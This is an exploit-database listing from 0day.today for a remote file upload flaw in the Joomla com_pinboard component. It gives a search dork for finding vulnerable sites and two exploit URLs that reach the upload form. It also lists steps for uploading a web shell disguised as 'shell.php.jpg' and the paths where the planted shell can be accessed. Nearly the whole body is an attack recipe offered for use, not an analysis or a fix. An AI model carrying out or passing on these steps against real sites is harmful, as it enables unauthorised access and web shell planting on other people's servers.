[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_pinboard Remote File Upload Vulnerability

Author
ViRuSMaN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5407
Category
web applications
Date add
23-06-2009
Platform
unsorted
==============================================================
Joomla Component com_pinboard Remote File Upload Vulnerability
==============================================================


##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploite :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] click on the photo in Top Of Left
|
| [#] upload your shell shell.php.jpg  &  Confirmer SVP
|
| [#] Pwd Your Shell
|  
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################



#  0day.today [2024-12-25]  #